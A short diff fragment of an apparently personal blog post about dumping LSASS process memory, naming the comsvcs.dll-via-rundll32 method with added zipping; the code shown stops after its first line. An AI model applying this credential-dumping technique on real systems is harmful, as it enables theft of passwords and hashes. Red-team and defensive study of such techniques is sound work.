sp00ks-git/sp00ks-git.github.io/_posts/2021-08-13-LSASS-Encrypted-Dump.md

 Two ways I dump LSASS can be seen below.

-The first way is to invoke comsvcs.dll with rundll32.exe.
-Here is the original code with added zipping but not compressing the file as to not cuase potential corruption.
+The first way is to invoke comsvcs.dll with rundll32 - here is the original code with added zipping but not compressing the file as to not cuase potential corruption.

 ```
 $processes = Get-Process